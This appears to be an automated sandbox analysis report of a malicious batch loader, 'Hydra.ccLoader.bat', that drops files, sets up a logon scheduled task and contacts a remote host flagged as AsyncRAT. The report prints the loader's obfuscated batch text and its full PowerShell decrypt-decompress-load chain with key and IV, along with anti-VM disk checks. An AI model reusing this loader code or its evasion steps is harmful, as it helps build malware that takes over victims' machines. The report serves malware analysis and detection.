Preview:	@echo off..%SNuMgUtlQoVeJvaiaAkZVsBJfeOvYBfRpBVQcYcQ%@%gldnQLrHniuoDHAmLGcgYmoieOizjfcxurPgxwoswOKsLD%%UvErraKJTWVicDRxigXTlRtOpsJJkBWxAcneFOKwKHWjCnmPFq%e%lOJAcbPcZrbzrayIZpNStwAjDVkmbfTeTZKIQClc%%MKfJiEieEnARyiPnAWgRDaUyWFsqPRxdKbHMvAvrbhxSsmvQUvqFel%c%MQHMCmRpNQxhwBdSaAPPvDb%%KjBvtBRYyOVVONS%h%jSKcVeZpRDpepwR%%OBbtKvVlYyJHFhdmILF%o%TZjFkmEQmMJbWMgmMzuNWydxvrJJzcwDQopPsviy%%fZmOHLSaRAiqRGuWMkTCUrjpfkHwrTqrVWRzQIOGRIHConYIVTGlpWWO% %XIwdwJXkQuVPUfdvmLlJHaSmZAynebZZcJTZsCuZJrxSdTaNCPckKf%%WQkeVkKfOuWMllddJqm%o%pCaigAKLoZPoXAXjhyzPZmJxggPCyMsUyfTtQbYvzZRPFIOKoUWlRxZdTCcZKimC%%UPSHDsgAepauTRyrfnEQhdbfQAnZYKrMoiLSWcLBPKNh%f%IZLDHEUIMzROMQcfgCtYnfLgGucCcawpTghACvqfweCITejlIwIitjLCoEXnBsGM%%BUGICCLlnCjDd%f%BlRTFroWJuFmXydDdyQFrjD%..%gUXWgHCZlsvcKyauNFlmdpFmiJyKMxUsIoNLtsPc%s%FaFdbTFxvRMYqzQoLOwjRmNxcuwKpbvPitypZjgQSnrFiurOXwHEsSbs%%haHwUiuwWPWbBpCHGqDVipI%e%INTtRwpsfcSi%%uYeWjlEuNvhfWMCxweSsEOgpaFAzEVzwuims%t%YYddIUrLnUKNVIXZQUFRPWEKfQSWKLOAjYyg%%oWTODMKQLImCwDoGBJctsYRcvbCfkEXkQlBXLcmjTUth

C:\Windows\$nya-onimai2\MzWhoQ.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	4.3900594222407125
Encrypted:	false
SSDEEP:	384:VZCSSrPcfu1FIyBl3pdSRf+yTq5+9f2sMbRAxzQ1yTkepoeL80bk20OzSIS+gL0i:VZArPDDIulZdSRWfY9f/hngDU2/t7
MD5:	B943A57BDF1BBD9C33AB0D33FF885983
SHA1:	1CEE65EEA1AB27EAE9108C081E18A50678BD5CDC
SHA-256:	878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
SHA-512:	CB7253DE88BD351F8BCB5DC0B5760D3D2875D39F601396A4250E06EAD9E7EDEFFCD94FA23F392833F450C983A246952F2BAD3A40F84AFF2ADC0F7D0EB408D03C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: NhoqAfkhHL.bat, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...GB..........."...0.................. ....@...... ....................................`...@......@............... ............................................................................................................................... ..H............text........ ...................... ..`.rsrc...............................@..@........................................H......................................................................ga..G..I..6..+......6.2..5.tK@.g1.9.....Q...@a..W1...}.... .d......</.X....m..Zg.."."^.F..0......G.c.....(D..(....G...u.KM...........D.\|/..J3....?.vMl.-.P...)...RZ..-....\|.0.x.....D.....>...G...C..e.....IZem...s....\|.l~.c........<d...y.W..E..2.&c\z..Z.......................................................................................%%........;m2....2m;............................................

C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	DOS batch file, ASCII text, with very long lines (3435), with CRLF line terminators
Category:	dropped
Size (bytes):	7306960
Entropy (8bit):	6.017027296439472
Encrypted:	false
SSDEEP:	49152:IZLQemZkP6CTsEjDRD4rpr9ksVdoUrE3KobuHAhtguS37adZO2UaSl5UDLL73Hcx:T
MD5:	98347650099E648660CEC15B17DBD5C0
SHA1:	C3162C64614F82D20587A1C0A2753C8B616884B7
SHA-256:	39FA01D351C5CDB6DE9C4155F0C7D4241578EA02E5FC735C19FAAE312487DC20
SHA-512:	2B0B853FE69E5F21C1ABAAF2CDA5716B39C72172A59C201BB16D96A2779D169AC07FC8300FE5271C27C982DFFA58EF4955CBF0E4489BA063EEC1F1190A9D11C0
Malicious:	true
Preview:	@echo off..%SNuMgUtlQoVeJvaiaAkZVsBJfeOvYBfRpBVQcYcQ%@%gldnQLrHniuoDHAmLGcgYmoieOizjfcxurPgxwoswOKsLD%%UvErraKJTWVicDRxigXTlRtOpsJJkBWxAcneFOKwKHWjCnmPFq%e%lOJAcbPcZrbzrayIZpNStwAjDVkmbfTeTZKIQClc%%MKfJiEieEnARyiPnAWgRDaUyWFsqPRxdKbHMvAvrbhxSsmvQUvqFel%c%MQHMCmRpNQxhwBdSaAPPvDb%%KjBvtBRYyOVVONS%h%jSKcVeZpRDpepwR%%OBbtKvVlYyJHFhdmILF%o%TZjFkmEQmMJbWMgmMzuNWydxvrJJzcwDQopPsviy%%fZmOHLSaRAiqRGuWMkTCUrjpfkHwrTqrVWRzQIOGRIHConYIVTGlpWWO% %XIwdwJXkQuVPUfdvmLlJHaSmZAynebZZcJTZsCuZJrxSdTaNCPckKf%%WQkeVkKfOuWMllddJqm%o%pCaigAKLoZPoXAXjhyzPZmJxggPCyMsUyfTtQbYvzZRPFIOKoUWlRxZdTCcZKimC%%UPSHDsgAepauTRyrfnEQhdbfQAnZYKrMoiLSWcLBPKNh%f%IZLDHEUIMzROMQcfgCtYnfLgGucCcawpTghACvqfweCITejlIwIitjLCoEXnBsGM%%BUGICCLlnCjDd%f%BlRTFroWJuFmXydDdyQFrjD%..%gUXWgHCZlsvcKyauNFlmdpFmiJyKMxUsIoNLtsPc%s%FaFdbTFxvRMYqzQoLOwjRmNxcuwKpbvPitypZjgQSnrFiurOXwHEsSbs%%haHwUiuwWPWbBpCHGqDVipI%e%INTtRwpsfcSi%%uYeWjlEuNvhfWMCxweSsEOgpaFAzEVzwuims%t%YYddIUrLnUKNVIXZQUFRPWEKfQSWKLOAjYyg%%oWTODMKQLImCwDoGBJctsYRcvbCfkEXkQlBXLcmjTUth

C:\Windows\System32\Tasks\$nya-iM0vfZcH

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3492
Entropy (8bit):	3.5802182119839494
Encrypted:	false
SSDEEP:	96:tpSPnkp2Gdi3ipVA9ll7EhAMz3cHtgjy++:mfkYx39OhO6jy++
MD5:	AF410BE474489E89C5CF59E274206258
SHA1:	EADE9BF20440B22DC0D74ACA03F8F2A7FEF120B3
SHA-256:	67285EF8977C90BF2C3B48C935AC0F8F574203D743128A31B135187E5C7BAB5F
SHA-512:	0DBB0165F2E66D3B42CCA682A69327B4F11D5E1BBEF91AD752D7F558E1E6FF6970C080A2359ACA4E92760A085C32EADA4C73A7280757B7CCAE5F081E1A6A834B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.2.-.1.2.T.1.2.:.0.6.:.5.3...3.2.-.0.5.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.n.y.a.-.i.M.0.v.f.Z.c.H.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... . .

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	338
Entropy (8bit):	3.9376330439929346
Encrypted:	false
SSDEEP:	6:kKZHxGEeBfxJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:Rxr0CkPlE99SCQl2DUevat
MD5:	DC520E1DB327987D68DA7AAA57D0D967
SHA1:	1B02D673BB275B841BA8F4C636A21EB4332F62C2
SHA-256:	8E3C387D6A22DA73618B9B5E1776A3383FD44E1DDB5853C0CF133AED67979E6B
SHA-512:	0513D9808E7B728B3BF5FA900F4B1A7412BD3BEB99361F07F3DF8D21A4B2B8A4D8EE9F07E4864824638850796E08939436B7F763268A7356F01550D6198F6A98
Malicious:	false
Preview:	p...... ............Z...(................p...L.....=M... a.,M.............=M.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

\Device\Null

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (2196), with CRLF line terminators
Category:	dropped
Size (bytes):	2386
Entropy (8bit):	5.723782857064336
Encrypted:	false
SSDEEP:	48:9JFHDR56QRTRLRx/B3qBB3p8Nv9PAobNPv4pXyB1N6r9FKo2Ukm2Uxr2UGd:PFHDR5F5d7/BaBB58nAP+uFKo2Dm2iru
MD5:	F4227726EDE41C6CAAF6F582E15432E8
SHA1:	9EC3FEFFC42D578E1C0C37DC256F94C0FB05B65F
SHA-256:	C1D4579EE2DAF54B4F98B2D68C0C784AA00458B4497B990A68A11A6ED078FB3B
SHA-512:	A4EC7E69C78208ED160F1AA9D92E453FB5E1766B9CBA83C6DF99B4D838F9725AE019DF1883BFCDE366951381AE7E08C0C4971CCE1AC25E5C84B5396C1BC66FA4
Malicious:	false
Preview:	Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function LaqSe($iUuMH){.$vwFBp=[System.Security.Cryptography.Aes]::Create();.$vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs=');.$vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ==');.$mWNkD=$vwFBp.CreateDecryptor();.$FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length);.$mWNkD.Dispose();.$vwFBp.Dispose();.$FMJVb;}function ODxLi($iUuMH){.Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', '');.Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', '');.Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZip*S

Static File Info

General

File type:	DOS batch file, ASCII text, with very long lines (3435), with CRLF line terminators
Entropy (8bit):	6.017027296439472
TrID:
File name:	Hydra.ccLoader.bat
File size:	7'306'960 bytes
MD5:	98347650099e648660cec15b17dbd5c0
SHA1:	c3162c64614f82d20587a1c0a2753c8b616884b7
SHA256:	39fa01d351c5cdb6de9c4155f0c7d4241578ea02e5fc735c19faae312487dc20
SHA512:	2b0b853fe69e5f21c1abaaf2cda5716b39c72172a59c201bb16d96a2779d169ac07fc8300fe5271c27c982dffa58ef4955cbf0e4489ba063eec1f1190a9d11c0
SSDEEP:	49152:IZLQemZkP6CTsEjDRD4rpr9ksVdoUrE3KobuHAhtguS37adZO2UaSl5UDLL73Hcx:T
TLSH:	0B7633712B841FAB0D5C812DA0DB7E3E01C51F65A91FD0E3C5B63682075DB976B3AC2A
File Content Preview:	@echo off..%SNuMgUtlQoVeJvaiaAkZVsBJfeOvYBfRpBVQcYcQ%@%gldnQLrHniuoDHAmLGcgYmoieOizjfcxurPgxwoswOKsLD%%UvErraKJTWVicDRxigXTlRtOpsJJkBWxAcneFOKwKHWjCnmPFq%e%lOJAcbPcZrbzrayIZpNStwAjDVkmbfTeTZKIQClc%%MKfJiEieEnARyiPnAWgRDaUyWFsqPRxdKbHMvAvrbhxSsmvQUvqFel%c%

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-12T18:02:48.092535+0100	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	135.125.21.87	4782	192.168.2.7	49816	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 18:02:46.513772964 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:02:46.646873951 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:02:46.646956921 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:02:46.659722090 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:02:46.782330990 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:02:47.929055929 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:02:47.929208994 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:02:47.929301023 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:02:47.965987921 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:02:48.092535019 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:02:48.366986036 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:02:48.413109064 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:02:50.813021898 CET	49828	443	192.168.2.7	108.181.61.49
Dec 12, 2024 18:02:50.813065052 CET	443	49828	108.181.61.49	192.168.2.7
Dec 12, 2024 18:02:50.813136101 CET	49828	443	192.168.2.7	108.181.61.49
Dec 12, 2024 18:02:50.814677954 CET	49828	443	192.168.2.7	108.181.61.49
Dec 12, 2024 18:02:50.814696074 CET	443	49828	108.181.61.49	192.168.2.7
Dec 12, 2024 18:02:53.244695902 CET	443	49828	108.181.61.49	192.168.2.7
Dec 12, 2024 18:02:53.244771957 CET	49828	443	192.168.2.7	108.181.61.49
Dec 12, 2024 18:02:53.287322044 CET	49828	443	192.168.2.7	108.181.61.49
Dec 12, 2024 18:02:53.287353039 CET	443	49828	108.181.61.49	192.168.2.7
Dec 12, 2024 18:02:53.287705898 CET	443	49828	108.181.61.49	192.168.2.7
Dec 12, 2024 18:02:53.299336910 CET	49828	443	192.168.2.7	108.181.61.49
Dec 12, 2024 18:02:53.343327045 CET	443	49828	108.181.61.49	192.168.2.7
Dec 12, 2024 18:02:53.912750006 CET	443	49828	108.181.61.49	192.168.2.7
Dec 12, 2024 18:02:53.912933111 CET	443	49828	108.181.61.49	192.168.2.7
Dec 12, 2024 18:02:53.913099051 CET	49828	443	192.168.2.7	108.181.61.49
Dec 12, 2024 18:02:53.982429028 CET	49828	443	192.168.2.7	108.181.61.49
Dec 12, 2024 18:02:54.302625895 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:02:54.422501087 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:02:54.422600985 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:02:54.544394970 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:02:54.831592083 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:02:54.881907940 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:02:55.023600101 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:02:55.063546896 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:02:55.183280945 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:02:55.183448076 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:02:55.303231001 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:03:02.476905107 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:03:02.597152948 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:03:02.597218990 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:03:02.717009068 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:03:27.741539001 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:03:27.902817011 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:03:52.944834948 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:03:53.064934969 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:04:18.070116997 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:04:18.189883947 CET	4782	49816	135.125.21.87	192.168.2.7
Dec 12, 2024 18:04:43.195179939 CET	49816	4782	192.168.2.7	135.125.21.87
Dec 12, 2024 18:04:43.314950943 CET	4782	49816	135.125.21.87	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 18:02:50.669286966 CET	62749	53	192.168.2.7	1.1.1.1
Dec 12, 2024 18:02:50.809104919 CET	53	62749	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 18:02:50.669286966 CET	192.168.2.7	1.1.1.1	0xa937	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 18:01:55.840845108 CET	1.1.1.1	192.168.2.7	0x5846	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 18:02:50.809104919 CET	1.1.1.1	192.168.2.7	0xa937	No error (0)	ipwho.is		108.181.61.49	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipwho.is

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49828	108.181.61.49	443	4412	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 17:02:53 UTC	150	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Host: ipwho.is Connection: Keep-Alive
2024-12-12 17:02:53 UTC	223	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 17:02:53 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2024-12-12 17:02:53 UTC	1021	IN	Data Raw: 33 66 31 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f Data Ascii: 3f1{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.189", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yo

Target ID:	0
Start time:	12:02:00
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Hydra.ccLoader.bat" "
Imagebase:	0x7ff6b6c60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:02:01
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:02:01
Start date:	12/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff6e26e0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:02:01
Start date:	12/12/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Imagebase:	0x7ff6f5220000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:02:03
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', ''); Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZipStream($jKyNf, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[System.Reflection.Assembly]::Load([byte[]]$iUuMH);'.Replace('', ''); Invoke-Expression '$nGmNE=$VDuEP.EntryPoint;'.Replace('', ''); Invoke-Expression '$nGmNE.Invoke($null, $wjUzC);'.Replace('', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));
Imagebase:	0x7ff6b6c60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:02:03
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:02:12
Start date:	12/12/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dllhost.exe /Processid:{a7d7aefc-34fa-4c44-83e0-dba733732ecf}
Imagebase:	0x7ff7d8730000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:02:12
Start date:	12/12/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff6fc1b0000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:02:13
Start date:	12/12/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff6d9390000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	12:02:13
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\Hydra.ccLoader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Imagebase:	0x7ff6b6c60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:02:13
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:02:13
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	12:02:17
Start date:	12/12/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff74b010000
File size:	94'720 bytes
